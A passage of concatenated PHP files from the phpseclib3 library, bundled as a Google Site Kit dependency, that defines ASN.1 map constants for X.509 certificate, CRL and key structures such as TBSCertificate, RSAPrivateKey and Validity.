\Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\GeneralName::MAP]; } <?php /** * Time * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Time * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Time { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_CHOICE, 'children' => ['utcTime' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UTC_TIME], 'generalTime' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_GENERALIZED_TIME]]]; } <?php /** * Curve * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Curve * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Curve { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['a' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\FieldElement::MAP, 'b' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\FieldElement::MAP, 'seed' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING, 'optional' => \true]]]; } <?php /** * CertificateList * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * CertificateList * * @author Jim Wigginton <terrafrost@php.net> */ abstract class CertificateList { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['tbsCertList' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\TBSCertList::MAP, 'signatureAlgorithm' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'signature' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING]]]; } <?php /** * SubjectPublicKeyInfo * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * SubjectPublicKeyInfo * * @author Jim Wigginton <terrafrost@php.net> */ abstract class SubjectPublicKeyInfo { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['algorithm' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'subjectPublicKey' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING]]]; } <?php /** * PBEParameter * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PBEParameter * * from https://tools.ietf.org/html/rfc2898#appendix-A.3 * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PBEParameter { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['salt' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING], 'iterationCount' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]]]; } <?php /** * PersonalName * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PersonalName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PersonalName { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SET, 'children' => ['surname' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING, 'constant' => 0, 'optional' => \true, 'implicit' => \true], 'given-name' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING, 'constant' => 1, 'optional' => \true, 'implicit' => \true], 'initials' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING, 'constant' => 2, 'optional' => \true, 'implicit' => \true], 'generation-qualifier' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING, 'constant' => 3, 'optional' => \true, 'implicit' => \true]]]; } <?php /** * TerminalIdentifier * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * TerminalIdentifier * * @author Jim Wigginton <terrafrost@php.net> */ abstract class TerminalIdentifier { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING]; } <?php /** * BuiltInStandardAttributes * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * BuiltInStandardAttributes * * @author Jim Wigginton <terrafrost@php.net> */ abstract class BuiltInStandardAttributes { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['country-name' => ['optional' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CountryName::MAP, 'administration-domain-name' => ['optional' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AdministrationDomainName::MAP, 'network-address' => ['constant' => 0, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\NetworkAddress::MAP, 'terminal-identifier' => ['constant' => 1, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\TerminalIdentifier::MAP, 'private-domain-name' => ['constant' => 2, 'optional' => \true, 'explicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PrivateDomainName::MAP, 'organization-name' => ['constant' => 3, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\OrganizationName::MAP, 'numeric-user-identifier' => ['constant' => 4, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\NumericUserIdentifier::MAP, 'personal-name' => ['constant' => 5, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PersonalName::MAP, 'organizational-unit-names' => ['constant' => 6, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\OrganizationalUnitNames::MAP]]; } <?php /** * AttributeValue * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * AttributeValue * * @author Jim Wigginton <terrafrost@php.net> */ abstract class AttributeValue { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_ANY]; } <?php /** * ExtensionAttributes * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * ExtensionAttributes * * @author Jim Wigginton <terrafrost@php.net> */ abstract class ExtensionAttributes { const MAP = [ 'type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SET, 'min' => 1, 'max' => 256, // ub-extension-attributes 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ExtensionAttribute::MAP, ]; } <?php /** * SignedPublicKeyAndChallenge * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * SignedPublicKeyAndChallenge * * @author Jim Wigginton <terrafrost@php.net> */ abstract class SignedPublicKeyAndChallenge { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['publicKeyAndChallenge' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PublicKeyAndChallenge::MAP, 'signatureAlgorithm' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'signature' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING]]]; } <?php /** * Prime_p * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Prime_p * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Prime_p { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]; } <?php /** * IssuingDistributionPoint * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * IssuingDistributionPoint * * @author Jim Wigginton <terrafrost@php.net> */ abstract class IssuingDistributionPoint { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['distributionPoint' => ['constant' => 0, 'optional' => \true, 'explicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DistributionPointName::MAP, 'onlyContainsUserCerts' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BOOLEAN, 'constant' => 1, 'optional' => \true, 'default' => \false, 'implicit' => \true], 'onlyContainsCACerts' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BOOLEAN, 'constant' => 2, 'optional' => \true, 'default' => \false, 'implicit' => \true], 'onlySomeReasons' => ['constant' => 3, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ReasonFlags::MAP, 'indirectCRL' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BOOLEAN, 'constant' => 4, 'optional' => \true, 'default' => \false, 'implicit' => \true], 'onlyContainsAttributeCerts' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BOOLEAN, 'constant' => 5, 'optional' => \true, 'default' => \false, 'implicit' => \true]]]; } <?php /** * PublicKeyAndChallenge * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PublicKeyAndChallenge * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PublicKeyAndChallenge { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['spki' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\SubjectPublicKeyInfo::MAP, 'challenge' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_IA5_STRING]]]; } <?php /** * AnotherName * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * AnotherName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class AnotherName { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['type-id' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER], 'value' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_ANY, 'constant' => 0, 'optional' => \true, 'explicit' => \true]]]; } <?php /** * PrivateKeyInfo * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PrivateKeyInfo * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PrivateKeyInfo { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['version' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'mapping' => ['v1']], 'privateKeyAlgorithm' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'privateKey' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PrivateKey::MAP, 'attributes' => ['constant' => 0, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Attributes::MAP]]; } <?php /** * RSAPrivateKey * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * RSAPrivateKey * * @author Jim Wigginton <terrafrost@php.net> */ abstract class RSAPrivateKey { // version must be multi if otherPrimeInfos present const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => [ 'version' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'mapping' => ['two-prime', 'multi']], 'modulus' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // n 'publicExponent' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // e 'privateExponent' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // d 'prime1' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // p 'prime2' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // q 'exponent1' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // d mod (p-1) 'exponent2' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // d mod (q-1) 'coefficient' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // (inverse of q) mod p 'otherPrimeInfos' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\OtherPrimeInfos::MAP + ['optional' => \true], ]]; } <?php /** * AuthorityKeyIdentifier * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * AuthorityKeyIdentifier * * @author Jim Wigginton <terrafrost@php.net> */ abstract class AuthorityKeyIdentifier { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['keyIdentifier' => ['constant' => 0, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\KeyIdentifier::MAP, 'authorityCertIssuer' => ['constant' => 1, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\GeneralNames::MAP, 'authorityCertSerialNumber' => ['constant' => 2, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertificateSerialNumber::MAP]]; } <?php /** * Pentanomial * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Pentanomial * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Pentanomial { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => [ 'k1' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // k1 > 0 'k2' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // k2 > k1 'k3' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], ]]; } <?php /** * CRLDistributionPoints * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * CRLDistributionPoints * * @author Jim Wigginton <terrafrost@php.net> */ abstract class CRLDistributionPoints { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DistributionPoint::MAP]; } <?php /** * OrganizationName * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * OrganizationName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class OrganizationName { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING]; } <?php /** * Extensions * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Extensions * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Extensions { const MAP = [ 'type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, // technically, it's MAX, but we'll assume anything < 0 is MAX 'max' => -1, // if 'children' isn't an array then 'min' and 'max' must be defined 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Extension::MAP, ]; } <?php /** * AuthorityInfoAccessSyntax * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * AuthorityInfoAccessSyntax * * @author Jim Wigginton <terrafrost@php.net> */ abstract class AuthorityInfoAccessSyntax { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AccessDescription::MAP]; } <?php /** * MaskGenAglorithm * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; /** * MaskGenAglorithm * * @author Jim Wigginton <terrafrost@php.net> */ abstract class MaskGenAlgorithm { const MAP = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP; } <?php /** * SubjectDirectoryAttributes * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * SubjectDirectoryAttributes * * @author Jim Wigginton <terrafrost@php.net> */ abstract class SubjectDirectoryAttributes { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Attribute::MAP]; } <?php /** * InvalidityDate * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * InvalidityDate * * @author Jim Wigginton <terrafrost@php.net> */ abstract class InvalidityDate { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_GENERALIZED_TIME]; } <?php /** * AttributeTypeAndValue * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * AttributeTypeAndValue * * @author Jim Wigginton <terrafrost@php.net> */ abstract class AttributeTypeAndValue { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AttributeType::MAP, 'value' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AttributeValue::MAP]]; } <?php /** * TBSCertificate * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * TBSCertificate * * @author Jim Wigginton <terrafrost@php.net> */ abstract class TBSCertificate { // assert($TBSCertificate['children']['signature'] == $Certificate['children']['signatureAlgorithm']) const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => [ // technically, default implies optional, but we'll define it as being optional, none-the-less, just to // reenforce that fact 'version' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'constant' => 0, 'optional' => \true, 'explicit' => \true, 'mapping' => ['v1', 'v2', 'v3'], 'default' => 'v1'], 'serialNumber' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertificateSerialNumber::MAP, 'signature' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'issuer' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Name::MAP, 'validity' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Validity::MAP, 'subject' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Name::MAP, 'subjectPublicKeyInfo' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\SubjectPublicKeyInfo::MAP, // implicit means that the T in the TLV structure is to be rewritten, regardless of the type 'issuerUniqueID' => ['constant' => 1, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\UniqueIdentifier::MAP, 'subjectUniqueID' => ['constant' => 2, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\UniqueIdentifier::MAP, // <http://tools.ietf.org/html/rfc2459#page-74> doesn't use the EXPLICIT keyword but if // it's not IMPLICIT, it's EXPLICIT 'extensions' => ['constant' => 3, 'optional' => \true, 'explicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Extensions::MAP, ]]; } <?php /** * DSAPublicKey * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * DSAPublicKey * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DSAPublicKey { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]; } <?php /** * Validity * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Validity * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Validity { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['notBefore' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Time::MAP, 'notAfter' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Time::MAP]]; } <?php /** * ReasonFlags * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * ReasonFlags * * @author Jim Wigginton <terrafrost@php.net> */ abstract class ReasonFlags { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING, 'mapping' => ['unused', 'keyCompromise', 'cACompromise', 'affiliationChanged', 'superseded', 'cessationOfOperation', 'certificateHold', 'privilegeWithdrawn', 'aACompromise']]; } <?php /** * EDIPartyName * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * EDIPartyName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class EDIPartyName { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => [ 'nameAssigner' => ['constant' => 0, 'optional' => \true, 'implicit' => \true] 